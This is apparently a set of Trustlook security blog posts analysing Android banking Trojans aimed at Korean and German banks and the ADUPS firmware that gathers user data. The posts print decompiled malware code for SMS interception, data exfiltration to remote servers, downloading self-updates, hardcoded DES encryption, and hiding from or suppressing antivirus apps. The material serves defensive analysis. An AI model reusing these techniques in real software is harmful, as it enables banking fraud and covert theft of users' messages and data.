Trojan Intercepts SMS Messages To Attack Banks In South Korea

Banks in South Korea recently started to offer customers a text messaging option to access accounts and authenticate transactions. It was reported that a major South Korea bank, KEB Hana Bank, was the first to launch the text banking service in the country on Nov 21, 2016. Unfortunately, cyber thieves have picked up on this, and are trying to get their hands on these text messages.

Trustlook labs discovered a new banking Trojan that targets these banks in South Korea that offer the text messaging service. The Trojan disguises itself as a Google Play app and the user is requested to grant device administrator rights for it. This prevents the malware for being removed.

The app starts as a background service and is invisible to the user. The package can be identified as having the following characteristics:

  • MD5: b4d419cd7dc4f7bd233fa87f89f73f22
  • SHA256: 1fa03f9fa2c6744b672433c06a1a3142997ba4f261b68eddbc03545caff06a82
  • Size: 100289 bytes
  • App name: Google_Play
  • Package name: com.android.systemsetting


The package icon is:

image00

Upon execution, the app persuades the user to grant device administrator access in order to maintain its presence on the system:

image02

The app disguises itself as “AhnLab V3 Mobile PLUS” which is a popular mobile security app in South Korea.

image01


In the meantime, it attempts to remove the legitimate AhnLab security apps:

 public void onClick(View arg2) {

       GeneralUtil.uninstallAPK(((Context)this), "com.ahnlab.v3mobileplus");

       GeneralUtil.uninstallAPK(((Context)this), "com.ahnlab.v3mobilesecurity.soda");


The malware attempts to collects the user’s device information and send it to the server:

image04

It then goes through the system to look for the following banking apps:

  • nh.smart
  • com.shinhan.sbanking
  • com.hanabank.ebk.channel.android.hananbank
  • com.webcash.wooribank
  • com.kbstar.kbbank

The following code snippets are used to retrieve information on any installed banking apps:

public class FBDBSender

   private void uploadInstallApp() {

       try {

[...]

           boolean v1 = CoreService.checkAPP(((Context)this), "nh.smart");

           boolean v2 = CoreService.checkAPP(((Context)this), "com.shinhan.sbanking");

           boolean v3 = CoreService.checkAPP(((Context)this), "com.hanabank.ebk.channel.android.hananbank");

           boolean v4 = CoreService.checkAPP(((Context)this), "com.webcash.wooribank");

           boolean v5 = CoreService.checkAPP(((Context)this), "com.kbstar.kbbank");

           String v6 = this.getVersion("nh.smart");

           String v7 = this.getVersion("com.shinhan.sbanking");

           String v8 = this.getVersion("com.hanabank.ebk.channel.android.hananbank");

           String v9 = this.getVersion("com.webcash.wooribank");

           String v10 = this.getVersion("com.kbstar.kbbank");

[...]

           UploadInstallAppTask v12 = new UploadInstallAppTask(this);

           String[] v13 = new String[10];

           String v11 = v1 ? "1" : "0";

           v13[0] = v11;

           v11 = v2 ? "1" : "0";

           v13[1] = v11;

           int v14 = 2;

           v11 = v3 ? "1" : "0";

           v13[v14] = v11;

           v14 = 3;

           v11 = v4 ? "1" : "0";

           v13[v14] = v11;

           v14 = 4;

           v11 = v5 ? "1" : "0";

           v13[v14] = v11;

           v13[5] = v6;

           v13[6] = v7;

           v13[7] = v8;

           v13[8] = v9;

           v13[9] = v10;

           v12.execute(((Object[])v13));

              [...]


The malware then sends out the captured information:

image03


The malware intercepts all the SMS messages between the device and the banks and sends it to the attacker:

public class SMSReceiver extends BroadcastReceiver {

   static final String ACTION = "android.provider.Telephony.SMS_RECEIVED";

   private final String TAG;



   public SMSReceiver() {

       super();

       this.TAG = "sms Receiver";

   }



   public void onReceive(Context arg23, Intent arg24) {

       if("android.provider.Telephony.SMS_RECEIVED".equals(arg24.getAction())) {

           Bundle v3 = arg24.getExtras();

           if(v3 != null) {

               SmsInfoDao v13 = new SmsInfoDao(arg23);

               Object v10 = v3.get("pdus");

               SmsMessage[] v8 = new SmsMessage[v10.length];

               int v4;

               for(v4 = 0; v4 < v10.length; ++v4) {

                   v8[v4] = SmsMessage.createFromPdu(v10[v4]);

               }



               SmsMessage[] v2 = v8;

               int v6 = v2.length;

               int v5;

               for(v5 = 0; v5 < v6; ++v5) {

                   SmsMessage v7 = v2[v5];

                   new Date().toString();

                   String v15 = v7.getDisplayOriginatingAddress();

                   String v16 = v7.getDisplayMessageBody();

                   if(v16.startsWith(Constant.NEW_SERVER_MSG_PREFIX)) {

                       String v9 = v16.substring(Constant.NEW_SERVER_MSG_PREFIX.length());

                       if(v9.startsWith("http")) {

                           Log.d("sms Receiver", "new address:" + v9);

                           SharedPreferences v11 = PreferenceManager.getDefaultSharedPreferences(arg23);

                           App.URL_BASE = v9;

                           v11.edit().putString("serverIp", v9).commit();

                       }

                   }



                   if(App.curInterceptState != 0 && System.currentTimeMillis() - App.curInterceptStateStartTime < 9223372036854775807L) {

                       SmsInfo v12 = new SmsInfo();

                       v12._id = (((int)Math.round(Math.random() * 9999999 + 1))) * -1;

                       v12.thread_id = "";

                       v12.service_center = "";

                       v12.name = "";

                       v12.phoneNumber = v15;

                       v12.smsbody = v16;

                       v12.date = new Date().getTime();

                       v12.type = 0;

                       v13.startWritableDatabase(true);

                       v13.insert(v12);

                       v13.setTransactionSuccessful();

                       v13.closeDatabase(true);

                       this.abortBroadcast();

                   }

               [...]

   public class SMSContent extends ContentObserver {

       public SMSContent(CoreService arg1, Handler arg2) {

           CoreService.this = arg1;

           super(arg2);

       }



       public void onChange(boolean arg23) {

           Log.i("SMS Core Service", "smsÓб仯");

           super.onChange(arg23);

           Cursor v8 = App.getInstance().getContentResolver().query(Uri.parse("content://sms/inbox"), null, " read = ?", new String[]{"0"}, "date asc");

           if(v8 != null && (v8.moveToFirst())) {

               int v10 = v8.getColumnIndex("_id");

               int v19 = v8.getColumnIndex("thread_id");

               int v16 = v8.getColumnIndex("service_center");

               int v12 = v8.getColumnIndex("person");

               int v14 = v8.getColumnIndex("address");

               int v18 = v8.getColumnIndex("body");

               int v9 = v8.getColumnIndex("date");

               int v20 = v8.getColumnIndex("type");

               do {

                   SmsInfo v17 = new SmsInfo();

                   v17._id = v8.getInt(v10);

                   v17.thread_id = v8.getString(v19);

                   v17.service_center = v8.getString(v16);

                   v17.name = v8.getString(v12);

                   v17.phoneNumber = v8.getString(v14);

                   v17.smsbody = v8.getString(v18);

                   v17.date = v8.getLong(v9);

                   v17.type = v8.getInt(v20);

                   if(!CommUtil.isEmpty(v17.smsbody)) {

                       Toast.makeText(CoreService.this, v17.smsbody + "", 0).show();

                       Log.i("SMS Core Service", v17.smsbody);

                       if(v17.smsbody.trim().startsWith(Constant.NEW_SERVER_MSG_PREFIX)) {

                           String v13 = v17.smsbody.substring(Constant.NEW_SERVER_MSG_PREFIX.length());

                           Log.i("SMS Core Service", v13);

                           Toast.makeText(CoreService.this, ((CharSequence)v13), 0).show();

                           if(v13.startsWith("http")) {

                               Log.d("SMS Core Service", "new server address:" + v13);

                               SharedPreferences v15 = PreferenceManager.getDefaultSharedPreferences(CoreService.this);

                               App.URL_BASE = v13;

                               v15.edit().putString("serverIp", v13).commit();

                               CoreService.this.getContentResolver().delete(Uri.parse("content://sms/" + v17._id), null, null);

                               CoreService.this.getSystemService("notification").cancelAll();

                           }

                       }

                       else if(v17.smsbody.trim().startsWith(Constant.LOCK_SCREEN_ON)) {

                           Log.i("SMS Core Service", v17.smsbody.trim() + " is not startsWith " + Constant.NEW_SERVER_MSG_PREFIX);

                       }



                       Log.d("SMS Core Service", "insert sms to db");

                       CoreService.this.sid.startWritableDatabase(true);

                       CoreService.this.sid.insert(v17);

                       CoreService.this.sid.setTransactionSuccessful();

                       CoreService.this.sid.closeDatabase(true);

                       if(App.curInterceptState == 0) {

                           continue;

                       }



                       if(System.currentTimeMillis() - App.curInterceptStateStartTime >= 9223372036854775807L) {

                           continue;

                       }



                       CoreService.this.getContentResolver().delete(Uri.parse("content://sms/" + v17._id), null, null);

                       CoreService.this.getSystemService("notification").cancelAll();

                   }

               }

               while(v8.moveToNext());



               CoreService.this.uploadDbSms();

           }



           v8.close();

       }


The app is capable of updating itself:

     protected String[] doInBackground(AppUpdateModel[] arg11) {

           String[] v6;

           try {

               AppUpdateModel v1 = arg11[0];

               String v2 = App.URL_BASE + v1.getUpdateUrl();

               Log.i("SMS Core Service", v2);

               long v4 = System.currentTimeMillis();

               CoreService.this.lastFileName = v4 + ".apk";

               v6 = new String[]{NetUtils.downApk(v2, v4 + ".apk", CoreService.this), v1.getAppPackageName()};

           }


Summary

For anyone using the text banking service that is being offered by some Korean banks, we suggest you install the Trustlook Mobile Security app to detect and block this attack, as well as to prevent further malicious activities.

Digging into ADUPS FOTA data collection details

People like to think their brand new phone is clean and free of malware, but that is not always the case. Some smartphone manufacturers choose to use a third party FOTA (Firmware Over-The-Air) service instead of Google’s, which can pose serious security risks. This is what happened in the case of Shanghai based ADUPS Technology Co.

ADUPS provides FOTA update services for mobile devices. Trustlook Labs researched multiple mobile devices and discovered several apps produced by ADUPS have serious security flaws. We researched a sample with package name “com.adups.fota”, app name “无线升级”, version 5.1.0.0.1.

The app comes preinstalled on the device. It collects many types of user information. In addition to specifications such as IMEI, IMSI, MAC address, version number, and operator, this app attempts to collect user’s SMS text messages and call logs. More troubling is that all of these procedures are done without user’s consent and are processed in the background.

Diving into the code…

The following code snippets show the app start to collect call logs and SMS messages:

    public static void getCallLogList(Context arg7, long arg8) {
        Cursor v1;
        StringBuffer v6 = new StringBuffer();
        String v3 = "date>" + arg8 + " and " + "date" + "<" + System.currentTimeMillis();
        try {
            v1 = arg7.getContentResolver().query(Uri.parse("content://com.ad.dinfo/call"), null, v3,
                    null, null);
            if(v1 != null) {
                goto label_25;
            }

            goto label_87;
        }
        catch(Exception v0) {
            goto label_99;
        }

        try {
        label_25:
            if(v1.getCount() > 0 && (v1.moveToFirst())) {
                TellMessageBean v0_2 = new TellMessageBean();
                v0_2.messages = "";
                v0_2.dctime = new SimpleDateFormat("yyyy-MM-dd HH:mm:ss").format(new Date());
                do {
                    v6.setLength(0);
                    String v2 = v1.getString(v1.getColumnIndex("number"));
                    v3 = v1.getString(v1.getColumnIndex("type"));
                    String v4 = v1.getString(v1.getColumnIndex("date"));
                    String v5 = v1.getString(v1.getColumnIndex("duration"));
                    v6.append(v2);
                    v6.append(":");
                    if("2".equals(v3)) {
                        v6.append("1");
                    }
                    else {
                        v6.append("0");
                    }

                    v6.append(":");
                    if("1".equals(v3)) {
                        v6.append("1");
                    }
                    else {
                        v6.append("0");
                    }

                    v6.append(":");
                    v6.append(v3);
                    v6.append(":");
                    v6.append(v4);
                    v6.append(":");
                    v6.append(v5);
                    v0_2.tells = v6.toString();
                    new DataBaseOperate(arg7).insertTellMessage(v0_2);
                    Trace.d(v0_2.toString());
                    if(v1.moveToNext()) {
                        continue;
                    }

                    break;
                }
                while(true);
            }
[...]

    public static void getSmsInPhone(Context arg7, long arg8) {
        Cursor v1;
        StringBuffer v6 = new StringBuffer();
        String v3 = "date > " + arg8 + " and " + "date <" + System.currentTimeMillis();
        try {
            v1 = arg7.getContentResolver().query(Uri.parse("content://com.ad.dinfo/msg"), null, v3,
                    null, null);
            if(v1 != null) {
                goto label_23;
            }

            goto label_83;
        }
        catch(SQLiteException v0) {
            goto label_95;
        }

        try {
        label_23:
            if(v1.getCount() > 0 && (v1.moveToFirst())) {
                TellMessageBean v0_3 = new TellMessageBean();
                v0_3.tells = "";
                v0_3.dctime = new SimpleDateFormat("yyyy-MM-dd HH:mm:ss").format(new Date());
                do {
                    v6.setLength(0);
                    String v2 = v1.getString(v1.getColumnIndex("address"));
                    v3 = v1.getString(v1.getColumnIndex("type"));
                    String v4 = v1.getString(v1.getColumnIndex("date"));
                    String v5 = "0";
                    v6.append(v2);
                    v6.append(":");
                    if("2".equals(v3)) {
                        v6.append("1");
                    }
                    else {
                        v6.append("0");
[...]

    public void getMessageData() {
        try {
            b.a(this.ctx);
            String v0_1 = h.b(this.ctx, "push");
            g.a(this.ctx, "message data:: " + v0_1);
            if(!TextUtils.isEmpty(((CharSequence)v0_1)) && !v0_1.startsWith("0")) {
                this.message_process(v0_1);
            }

            if(h.a(this.ctx)) {
                this.installReport();
                this.reportFailDownloadMesssage(31);
            }

            this.delOutMesssage();
            this.reInstallRemind();
        }
        catch(Exception v0) {
            z.a(((Throwable)v0));
        }

        a.c(this.ctx);
    }

 

The getTellMessageData() method shown below calls the above methods.

 

public void getTellMessageData(Context arg3) {
        try {
            arg3.getSharedPreferences(Const.CHECK_SETTING_NAME, 0);
            long v0_1 = this.getSharedPreferTellSchedule(arg3);
            DcTellMessage.getSmsInPhone(arg3, v0_1);
            DcTellMessage.getCallLogList(arg3, v0_1);
            this.updateSharedPreferTellMessageSchedule(arg3);
        }
        catch(Exception v0) {
            Trace.wtf(((Throwable)v0));
        }
    }

 

The collectDcData() method shown below calls getTellMessageData() and some other methods to collect other information and insert the data into an SQL database.

 

private void collectDcData() {
        try {
            File v0_1 = new File(Environment.getDataDirectory().getAbsolutePath() + this.dataPathZip);
            File v1 = new File(Environment.getDataDirectory().getAbsolutePath() + this.dataPathSource);
            if(!v0_1.exists()) {
                v0_1.mkdir();
            }

            if(v1.exists()) {
                goto label_26;
            }

            v1.mkdir();
        }
        catch(Exception v0) {
            Trace.wtf(((Throwable)v0));
        }

        try {
        label_26:
            new DcTellMessage().getTellMessageData(this.ctx);
            new DcMobileStatus().getDcMoblicStatus(this.ctx);
            new DcMessage().getMessageData(this.ctx);
            new DcApp(this.ctx).getDcApp();
        }
        catch(Exception v0) {
            Trace.wtf(((Throwable)v0));
        }
    }

 

The data are then written to JSON format and zipped:

 

private boolean convertAndZipFile() {
        boolean v0_2;
        try {
            Gson v0_1 = new Gson();
            DataBaseOperate v1 = new DataBaseOperate(this.ctx);
            FileUtil.writeSDFile(Environment.getDataDirectory().getAbsolutePath() + this.dataPathZip
                     + String.valueOf(new char[]{'D', 'c', 'M', 'o', 'b', 'i', 'l', 'e', 'S', 't', 'a',
                    't', 'u', 's', '.', 'j', 's', 'o', 'n'}), v0_1.toJson(v1.getMobileStatusList()));
            FileUtil.writeSDFile(Environment.getDataDirectory().getAbsolutePath() + this.dataPathZip
                     + String.valueOf(new char[]{'D', 'c', 'A', 'p', 'p', '.', 'j', 's', 'o', 'n'}),
                    v0_1.toJson(v1.getAppList()));
            FileUtil.writeSDFile(Environment.getDataDirectory().getAbsolutePath() + this.dataPathZip
                     + String.valueOf(new char[]{'D', 'c', 'T', 'e', 'l', 'l', 'M', 'e', 's', 's', 'a',
                    'g', 'e', '.', 'j', 's', 'o', 'n'}), v0_1.toJson(v1.getTellMessageList()));
            FileUtil.writeSDFile(Environment.getDataDirectory().getAbsolutePath() + this.dataPathZip
                     + String.valueOf(new char[]{'D', 'c', 'A', 'p', 'p', 'O', 'p', '.', 'j', 's', 'o',
                    'n'}), v0_1.toJson(v1.getAppOpList()));
            FileUtil.writeSDFile(Environment.getDataDirectory().getAbsolutePath() + this.dataPathZip
                     + String.valueOf(new char[]{'d', 'c', '_', 'a', 'p', 'p', '_', 'f', 'l', 'o', 'w',
                    '.', 'j', 's', 'o', 'n'}), v0_1.toJson(v1.getAppFlowList()));
            FileUtil.writeSDFile(Environment.getDataDirectory().getAbsolutePath() + this.dataPathZip
                     + String.valueOf(new char[]{'d', 'c', '_', 'm', 's', 'g', '_', 'k', 'e', 'y', '.',
                    'j', 's', 'o', 'n'}), v0_1.toJson(v1.getMessageList()));
            FileUtil.writeSDFile(Environment.getDataDirectory().getAbsolutePath() + this.dataPathZip
                     + String.valueOf(new char[]{'D', 'c', 'R', 'o', 'o', 't', 'I', 'n', 'f', 'o', '.',
                    'j', 's', 'o', 'n'}), v0_1.toJson(new DcBin().getBinFileList()));
            FileUtil.ZipFolder(Environment.getDataDirectory().getAbsolutePath() + this.dataPathZip,
                    Environment.getDataDirectory().getAbsolutePath() + this.dataPathSource + AnalyticsReport
                    .ZIP_FILENAME);
            v0_2 = true;
        }

 

The 7 JSON files contain various user information:

DcMobileStatus.json
Dcapp.json
DcTellMessage.json
DcappOp.json
dc_app_flow.json
dc_msg_key.json
DcRootInfo.json

The collected call logs and SMS messages are stored in “DcTellMessage.json” file. All data is then encrypted by using DES and sent out:

 

public void upload() {
        int v3 = Const.domains.length;
        if(v3 > 0 && !TextUtils.isEmpty(this.pid) && (HttpUtil.isNetWorkAvailable(this.ctx)) && (this
                .convertAndZipFile())) {
            int v1 = new Random().nextInt(v3);
            int v0 = 0;
            while(true) {
                if(v0 < v3) {
                    int v2 = v1 + 1;
                    if(this.upload(Const.domains[v1 % v3] + this.pid + "/" + Const.UPLOAD_LOG_RQ)) {
                        this.saveLastTime("dupt", System.currentTimeMillis());
                    }
                    else {
                        SystemClock.sleep(2000);
                        ++v0;
                        v1 = v2;
                        continue;
                    }
                }
                else {
                    break;
                }

                return;
            }

            this.saveLastTime("dupt", System.currentTimeMillis());
        }
    }

    private boolean upload(String arg9) {
        boolean v0 = false;
        try {
            MobileInfo v1_1 = MobileInfo.getInstance(this.ctx);
            File v2 = new File(Environment.getDataDirectory().getAbsolutePath() + this.dataPathSource
                     + AnalyticsReport.ZIP_FILENAME);
            if(!v2.exists()) {
                return v0;
            }

            MediaType v3 = MediaType.parse("text/plain");
            StringBuilder v4 = new StringBuilder();
            v4.append(AnalyticsReport.PARAM_MID).append('=').append(Mid.getMid(this.ctx)).append('&');
            v4.append(AnalyticsReport.PARAM_MODULE).append('=').append(String.valueOf(2)).append('&');
            v4.append(AnalyticsReport.PARAM_APPV).append('=').append("V5.0.0").append('&');
            v4.append(AnalyticsReport.PARAM_MODEL).append('=').append(v1_1.getMobileModel()).append(
                    '&');
            v4.append(AnalyticsReport.PARAM_PROJECT).append('=').append(ApkUtil.getAppMetaData(this.
                    ctx, String.valueOf(new char[]{'U', 'I', 'D'}))).append('&');
            v4.append(AnalyticsReport.PARAM_CHANNEL).append('=').append(ApkUtil.getAppMetaData(this.
                    ctx, String.valueOf(new char[]{'C', 'I', 'D'}))).append('&');
            v4.append(AnalyticsReport.PARAM_PRODUCT).append('=').append(ApkUtil.getAppMetaData(this.
                    ctx, String.valueOf(new char[]{'P', 'I', 'D'}))).append('&');
            v4.append(AnalyticsReport.PARAM_IMEI).append('=').append(v1_1.getIMEI()).append('&');
            v4.append(AnalyticsReport.PARAM_IMSI).append('=').append(v1_1.getIMSI()).append('&');
            v4.append(AnalyticsReport.PARAM_WIFIMAC).append('=').append(v1_1.getMacAddress()).append(
                    '&');
            v4.append(AnalyticsReport.PARAM_OPERATOR).append('=').append(v1_1.getOper()).append('&');
            v4.append(AnalyticsReport.PARAM_SN).append('=').append(v1_1.getSIMSN()).append('&');
            v4.append(AnalyticsReport.PARAM_SIM).append('=').append(v1_1.getSIMNum()).append('&');
            v4.append(AnalyticsReport.PARAM_OEM).append('=').append(v1_1.getOem()).append('&');
            v4.append(AnalyticsReport.PARAM_BRAND).append('=').append(v1_1.getBrand()).append('&');
            v4.append(AnalyticsReport.PARAM_APN).append('=').append(MobileInfo.mapNetworkTypeToType(
                    this.ctx)).append('&');
            v4.append(AnalyticsReport.PARAM_BUILDNUMBER).append('=').append(v1_1.getBuildnumber()).append(
                    '&');
            MultipartBuilder v1_2 = new MultipartBuilder();
            v1_2.addFormDataPart(AnalyticsReport.PARAM_ENCRYPTED, DES.encryptDES(v4.toString()));
            v1_2.addFormDataPart(AnalyticsReport.PARAM_PRODUCT, ApkUtil.getAppMetaData(this.ctx, String
                    .valueOf(new char[]{'P', 'I', 'D'})));
            v1_2.addFormDataPart(AnalyticsReport.PARAM_UPLOAD, AnalyticsReport.PARAM_UPLOAD, RequestBody
                    .create(v3, v2));
            Response v1_3 = OkHttpUtil.execute(new Builder().url(arg9).post(v1_2.build()).build());
            if(v1_3 == null) {
                return v0;
            }

 

The DES.encryptDES() method that is used in the above code is shown below:

 

public class DES {
    private static String DEF_KEY;
    private static byte[] iv;

    static {
        DES.iv = new byte[]{1, 2, 3, 4, 5, 6, 7, 8};
        DES.DEF_KEY = String.valueOf(new char[]{'N', 'o', 't', 'C', 'r', 'a', 'c', 'k'});
    }

    public DES() {
        super();
    }
[...]
   public static String encryptDES(String arg1) {
        return DES.encryptDES(arg1, DES.DEF_KEY);
    }

    public static String encryptDES(String arg4, String arg5) {
        String v0_2;
        try {
            IvParameterSpec v0_1 = new IvParameterSpec(DES.iv);
            SecretKeySpec v1 = new SecretKeySpec(arg5.getBytes(), "DES");
            Cipher v2 = Cipher.getInstance("DES/CBC/PKCS5Padding");
            v2.init(1, ((Key)v1), ((AlgorithmParameterSpec)v0_1));
            v0_2 = Base64.encode(v2.doFinal(arg4.getBytes()));
        }
        catch(Exception v0) {
            Trace.wtf(((Throwable)v0));
            v0_2 = "";
        }

        return v0_2;
    }

 

The DES encryption key is “NotCrack” and the IV is 12345678.
The data is sent to the following domain “https://bigdata.adups.com/”

 

public static String[] domains = { String.valueOf(new char[] { 104, 116, 116, 112, 115, 58, 47, 47, 98, 105, 103, 100, 97, 116, 97, 46, 97, 100, 117, 112, 115, 46, 99, 111, 109, 47 }) };

 

The data is uploaded every 72 hours:

 

        Const.ANALYTICS_SCHEDULE_DEF = 259200000;
[...]
    private boolean isOverDCUploadTime() {
        boolean v0 = false;
        long v2 = System.currentTimeMillis();
        long v4 = this.prefs.getLong("dupt", -1);
        if(v4 < 0) {
            this.saveLastTime("dupt", v2);
        }
        else if(v2 - v4 >= Const.ANALYTICS_SCHEDULE_DEF) {
            v0 = true;
        }

        return v0;
    }
[...]
    private void checkDc() {
        if(this.isOverDCTime()) {
            this.collectDcData();
        }

        if(this.isOverDCUploadTime()) {
            this.upload();
        }
    }

 

Summary
The Trustlook Mobile Security app detects this app as “Android.Trojan.Adups”. Trustlook’s anti-threat platform can effectively alert and remove the threat. Download the Trustlook app for free from the Google Play store.

Trustlook Releases ADUPS Vulnerability Detector

Trustlook has released a new feature in its Trustlook Mobile Security app that identifies the presence of rogue firmware from Shanghai ADUPS Technology Co. This potentially dangerous firmware comes pre-installed on some Android phones, and can monitor text messages, phone call histories, and details of how the phone is being used all without the user’s permission.

Until now, there was no easy way for users to check for this vulnerability. Only the most technically sophisticated users could identify the threat by observing the network traffic. Now, Trustlook is providing an easy-to-use, single-click ADUPS Vulnerability detector within the Trustlook Mobile Security app.

The Trustlook Mobile Security app is available to download for free from Google Play. It currently checks for all known versions of the ADUPS system apps that conduct aggressive data collection, with more being added as they are discovered.

We have also created an infographic with more details on the ADUPS threat.

Banking Trojan Targets German Financial Institutions

This report summarizes a mobile malware attack recently discovered by Trustlook Labs. Based on the information we obtained, Trustlook can confirm that various financial institutions across the world have been targeted, with Germany being the most targeted country in the attack.

Trustlook Labs investigated the malware’s attack vectors as well as the communication between the compromised devices and their command-and-control (C&C) server infrastructure. The attack targets 15 financial institutions in Germany. Based on our findings, we expect that mobile users of other regional financial services institutions will face similar threats.

The malware is likely distributed through a link embedded in an email or text message, or from a phishing website. The user downloads an app and “sideloads” it since the app is not directly from the Google Play Store.

The malware masquerades as an Email client and comes with a corresponding icon.

image02

The app forces the user to grant device administrator access.

image04

The malware then calls setComponentEnabledSetting() to hide the icon:

  private void invoke_hideApp2()

  {

    getApplicationContext().getPackageManager().setComponentEnabledSetting(getComponentName(), 2, 1);

  }

 

  public PendingIntent f()

  {

    Intent localIntent = new Intent(n);

    return PendingIntent.getBroadcast(getApplicationContext(), 0, localIntent, 0);

  }

   

The malware hides strings by inserting characters in a random location inside the string. For example:

public static final String[] d = { “c!o!m!.qiho!o.!s!ec!ur!i!t!y!”.replace(“!”, “”), “co!m.!an!tiv!i!r!u!s”.replace(“!”, “”), “co!m!.t!heg!old!e!ng!o!o!da!pp!s!.!ph!on!e!_c!l!e!aning!_v!iru!s_f!r!e!e!.c!l!ean!e!r.!b!oos!t!er!”.replace(“!”, “”), “c!om!.antiv!ir!us.!table!t!”.replace(“!”, “”), “c!om!.!n!qm!o!b!il!e.!an!t!i!v!i!r!u!s20!”.replace(“!”, “”), “co!m.km!s!.!f!r!ee”.replace(“!”, “”), “co!m!.!dr!w!e!b!”.replace(“!”, “”), “co!m!.!t!rus!t!l!o!ok!.!a!nt!i!v!i!r!u!s!”.replace(“!”, “”), “c!om!.!es!e!t.e!m!s2!.gp!”.replace(“!”, “”), “com!.e!set!.!e!m!s.!g!p!”.replace(“!”, “”), “c!om.s!y!ma!nte!c.mo!b!i!le!s!e!cur!it!y!”.replace(“!”, “”), “c!om.!d!u!ap!p!s.!a!n!t!i!vir!us”.replace(“!”, “”), “c!o!m.!p!ir!i!f!or!m!.!c!c!l!ea!ner!”.replace(“!”, “”), “c!o!m!.!c!l!ean!mast!e!r!.!m!guar!d”.replace(“!”, “”), “c!o!m.clea!n!m!ast!er.s!e!cu!ri!t!y”.replace(“!”, “”), “c!o!m!.!s!on!y!er!i!c!sso!n!.!m!t!p!.!ext!en!s!ion.f!ac!to!r!yr!es!et”.replace(“!”, “”), “com!.!a!n!hlt!.!ant!i!vi!ru!sp!r!o!”.replace(“!”, “”), “co!m.c!l!e!a!n!m!as!ter.!s!d!k”.replace(“!”, “”), “c!om!.!qi!ho!o!.!se!cu!rit!y.!l!i!te”.replace(“!”, “”), “o!e!m!.!a!nt!iv!i!r!us”.replace(“!”, “”), “c!om!.!ne!tqi!n!.an!ti!v!ir!u!s!”.replace(“!”, “”), “d!r!oi!d!d!u!d!es!.!b!es!t!.!an!i!tv!i!r!u!s!”.replace(“!”, “”), “c!om.b!i!t!d!ef!e!nd!e!r.!a!nt!iv!ir!u!s!”.replace(“!”, “”), “c!o!m.!dia!nx!ino!s!.!op!ti!m!iz!er!.d!upl!a!y!”.replace(“!”, “”), “c!o!m!.c!l!ea!nma!ster.!mg!ua!rd_x!8!”.replace(“!”, “”), “c!om!.w!o!mb!oi!dsy!st!e!m!s!.!an!t!i!v!i!ru!s.s!e!cu!r!i!ty.!a!n!d!r!oi!d”.replace(“!”, “”), “co!m.!nq!mob!il!e.a!nt!iv!ir!u!s!2!0!.!cl!a!rob!r!”.replace(“!”, “”), “c!o!m!.!r!e!f!e!r!p!l!i!s!h!.!V!iru!s!R!e!mo!v!al!F!o!r!A!ndr!o!i!d”.replace(“!”, “”), “c!o!m.!c!l!e!a!n!ma!s!t!er!.b!o!o!s!t!”.replace(“!”, “”), “co!m!.z!r!gi!u!.!a!nti!v!ir!u!s!”.replace(“!”, “”), “a!v!g!.!a!n!t!i!vi!r!us”.replace(“!”, “”) };

From the above string, the malware retrieves the process names of widely used mobile security products, including Trustlook Antivirus:

  • com.qihoo.security
  • com.antivirus
  • com.thegoldengoodapps.phone_cleaning_virus_free.cleaner.booster
  • com.antivirus.tablet
  • com.nqmobile.antivirus20
  • com.kms.free
  • com.drweb
  • com.trustlook.antivirus
  • com.eset.ems2.gp
  • com.eset.ems.gp
  • com.symantec.mobilesecurity
  • com.duapps.antivirus
  • com.piriform.ccleaner
  • com.cleanmaster.mguard
  • com.cleanmaster.security
  • com.sonyericsson.mtp.extension.factoryreset
  • com.anhlt.antiviruspro
  • com.cleanmaster.sdk
  • com.qihoo.security.lite
  • oem.antivirus
  • com.netqin.antivirus
  • droiddudes.best.anitvirus
  • com.bitdefender.antivirus
  • com.dianxinos.optimizer.duplay
  • com.cleanmaster.mguard_x8
  • com.womboidsystems.antivirus.security.android
  • com.nqmobile.antivirus20.clarobr
  • com.referplish.VirusRemovalForAndroid
  • com.cleanmaster.boost
  • com.zrgiu.antivirus
  • avg.antivirus

If any one of the above active processes is found, the malware immediately launches the home screen to suppress the process.

    List localList = com.jaredrummler.android.processes.a.a(paramContext);

    if ((e.g(paramContext)) && (!i.a(com.jlkbvcbyjjscyxvsudkmjabndnkrbn.a.a.a, localList, null)))

    {

      a();

      return;

    }

    if (com.jlkbvcbyjjscyxvsudkmjabndnkrbn.a.a.d.length > 0) // list of security product strings

    {

      int i = 0;

      while (i < com.jlkbvcbyjjscyxvsudkmjabndnkrbn.a.a.d.length)

      {

        if (i.a(com.jlkbvcbyjjscyxvsudkmjabndnkrbn.a.a.d[i], localList, null)) // i.a(String arg2, List arg3, Context arg4) search the active process under “/proc”

        {

          i.b(paramContext); // Launch home screen

          return;

        }

        i += 1;

      }

}

[…]

  public static void b(Context paramContext)

  {

    Intent localIntent = new Intent(“android.intent.action.MAIN”);

    localIntent.addCategory(“android.intent.category.HOME”);

    localIntent.setFlags(268435456);

    paramContext.startActivity(localIntent);

  }

The malware sends out system information, and all communications are SSL encrypted. The following is an example of decrypted traffic:

image03

The malware then monitors the process related to the financial institutions. The process lists are taken from the following string:

public static final String b = “[{“to”: “de.postbank.finanzassistent”,”body”: “%API_URL%%PARAM%17”},{“to”: “de.fiducia.smartphone.android.banking.vr”,”body”: “%API_URL%%PARAM%16”},{“to”: “mobile.santander.de”,”body”: “%API_URL%%PARAM%18”},{“to”: “de.adesso.mobile.android.gad”,”body”: “%API_URL%%PARAM%68”},{“to”: “com.starfinanz.smob.android.sfinanzstatus”,”body”: “%API_URL%%PARAM%11”},{“to”: “com.starfinanz.mobile.android.dkbpushtan”,”body”: “%API_URL%%PARAM%69”},{“to”: “com.isis_papyrus.raiffeisen_pay_eyewdg”,”body”: “%API_URL%%PARAM%10”},{“to”: “com.starfinanz.smob.android.sbanking”,”body”: “%API_URL%%PARAM%70”},{“to”: “de.dkb.portalapp”,”body”: “%API_URL%%PARAM%15”},{“to”: “com.ing.diba.mbbr2″,”body”: “%API_URL%%PARAM%9”},{“to”: “de.ing_diba.kontostand”,”body”: “%API_URL%%PARAM%67”},{“to”: “de.commerzbanking.mobil”,”body”: “%API_URL%%PARAM%13”},{“to”: “de.consorsbank”,”body”: “%API_URL%%PARAM%14”},{“to”: “com.db.mm.deutschebank”,”body”: “%API_URL%%PARAM%8”},{“to”: “de.comdirect.android”,”body”: “%API_URL%%PARAM%12″}]”.replace(“%PARAM%”, “njs2/?m=”);

The affected banking apps are:

  • de.postbank.finanzassistent
  • de.fiducia.smartphone.android.banking.vr
  • mobile.santander.de
  • de.adesso.mobile.android.gad
  • com.starfinanz.smob.android.sfinanzstatus
  • com.starfinanz.mobile.android.dkbpushtan
  • com.isis_papyrus.raiffeisen_pay_eyewdg
  • com.starfinanz.smob.android.sbanking
